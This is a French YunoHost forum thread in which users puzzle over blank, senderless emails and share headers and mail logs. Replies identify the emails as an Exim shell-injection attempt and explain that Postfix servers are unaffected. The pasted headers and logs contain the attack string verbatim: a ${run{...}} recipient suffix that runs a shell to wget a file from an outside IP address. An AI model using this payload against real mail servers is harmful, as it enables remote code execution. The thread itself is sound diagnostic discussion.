Rouncube réception de mails sans titres et sans expéditeurs

Bonjour,
J’utilise yunohost 3 5 2 2 sur un vieux laptop. Ca fonctionne.
Mercredi dernier j’ai reçu un mail sans titre et ans expéditeur.
Même quand je clique sur “répondre” ça me me donne pas d’adresse.
Je viens de recevoir le même et je trouve ça inquiétant. Avez-vous une explication rationelle à ce qui me semble surnaturel ? Pourquoi ca ? Pourquoi moi ?

1 Like

Je viens d’expérimenter la même chose que toi depuis quelques heures… Effectivement, étrange !

Bonjour,

J’ai également reçu un mail de ce type.
Voici l’entête donnée par K9-Mail dans laquelle j’ai remplacé une partie du nom de domaine par *** et le prénom par prénom (prénom@***.ynh.fr) :

Return-Path: <SRS0=KH2a=UZ=epf.com=root@***.ynh.fr>
Delivered-To: prénom+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@***.ynh.fr
Received: from epf.com (us-east1b.itmerri.com [138.68.7.199]) by ***.ynh.fr (Postfix) with SMTP id B7F7944977 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@***.ynh.fr>; Wed, 26 Jun 2019 03:17:23 +0200 (CEST)
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
X-Spam: Yes

ppr

Cela se produit de plus en plus egalement vers mon adresse root
étrange… provenant que de ce site “138.68.7.199”, j’vais investigué ;;;;
cela ressemble beaucoup à du spoofing mais provenant que de ce serveur et sur la base du ndd “ynh.fr” “nohost.fr

Bonjour,

Même chose sur mon instance.

Les en-têtes du courrier sont comparables à celles données plus haut par @ppr

La partie correspondante (anonymisée) de /var/log/mail.log est donnée ci-dessous, pour complément d’information à destination de plus compétent que moi.

L’expéditeur semble essayer plusieurs boîtes (‘Mailbox doesn’t exist: Junk’).

Le suffixe du nom de destinataire ressemble vaguement (pour moi) à du code à exécuter (’${run{…}}’ ou à une tentative de téléchargement (‘wgetx2065.181.191.163[…]’).

Faut-il s’en inquiéter?

Merci!

Jun 25 20:07:02 server postfix/smtpd[17837]: connect from us-east1b.itmerri.com[138.68.7.199]
Jun 25 20:07:04 server postfix/smtpd[17837]: 011D88D40B8: client=us-east1b.itmerri.com[138.68.7.199]
Jun 25 20:07:04 server postsrsd[17846]: srs_forward: root@dsq.com rewritten as SRS0=kzcE=UY=dsq.com=root@server.noho.st
Jun 25 20:07:04 server postfix/cleanup[17845]: 011D88D40B8: message-id=<>
Jun 25 20:07:05 server postfix/qmgr[1663]: 011D88D40B8: from=SRS0=kzcE=UY=dsq.com=root@server.noho.st, size=815, nrcpt=1 (queue active)
Jun 25 20:07:05 server dovecot: lda(user@server.noho.st): Error: sieve: msgid=unspecified: failed to store into mailbox ‘Junk’: Mailbox doesn’t exist: Junk
Jun 25 20:07:05 server dovecot: lda(user@server.noho.st): Error: sieve: msgid=unspecified: failed to store into mailbox ‘${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}’: Mailbox doesn’t exist: ${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}
Jun 25 20:07:05 server dovecot: lda(user@server.noho.st): Error: sieve: Execution of script /etc/dovecot/global_script/rspamd.sieve failed with unsuccessful implicit keep
Jun 25 20:07:05 server dovecot: lda(user@server.noho.st): msgid=unspecified: save failed to open mailbox ${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}: Mailbox doesn’t exist: ${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}
Jun 25 20:07:05 server postfix/smtpd[17837]: disconnect from us-east1b.itmerri.com[138.68.7.199] helo=1 mail=1 rcpt=1 data=1 quit=1 commands=5
Jun 25 20:07:05 server dovecot: lda(user@server.noho.st): msgid=unspecified: saved mail to INBOX
Jun 25 20:07:05 server postfix/pipe[17848]: 011D88D40B8: to=user+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.noho.st, orig_to=root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.noho.st, relay=dovecot, delay=2.2, delays=2/0.01/0/0.18, dsn=2.0.0, status=sent (delivered via dovecot service)
Jun 25 20:07:05 server postfix/qmgr[1663]: 011D88D40B8: removed

Idem après analyse de la source c’est une tentative d’injection shell qui se sert du + des mails .

C’est une attaque contre exim, nous on est sur postfix, du coup nous ne sommes pas concernés, sauf qu’on reçois des mails bizarres et casse pied.

1 Like

Si ça vous intéresse, voici un lien qui décrit le problème avec la réponse qui explique le contexte : https://security.stackexchange.com/questions/212077/unusual-mail-headers-show-evidence-of-mta-attack-have-i-been-pwned

This topic was automatically closed 15 days after the last reply. New replies are no longer allowed.